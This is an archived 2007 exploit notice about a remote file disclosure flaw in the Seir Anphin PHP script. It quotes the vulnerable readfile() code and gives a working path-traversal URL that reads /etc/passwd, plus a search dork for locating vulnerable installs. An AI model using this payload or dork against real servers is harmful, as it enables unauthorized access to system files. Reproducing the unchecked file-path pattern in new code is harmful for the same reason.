Security Advisory: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Sphider Version 1.2.x (include_dir)
file include
  Actualite bulletins fr/site.asp SQL Injection Vulnerability

From: ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date: 29.04.2007
Subject: Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability

---------------------------------------------------------------------------------
-
AYYILDIZ.ORG PreSents...

Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1
Dork:"Powered by Seir Anphin"

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:   */Siz Yokken AYYILDIZ Vardi.*/
---------------------------------------------------------------------------------
--
Bug:
               exit();
               header("Content-Disposition: attachment; filename=\"$filename\"");
               header('Content-Length: ' . filesize($a['filepath']));
               readfile($a['filepath']);
               exit();

---------------------------------------------------------------------------------
--

Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd

---------------------------------------------------------------------------------
--

Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG

test server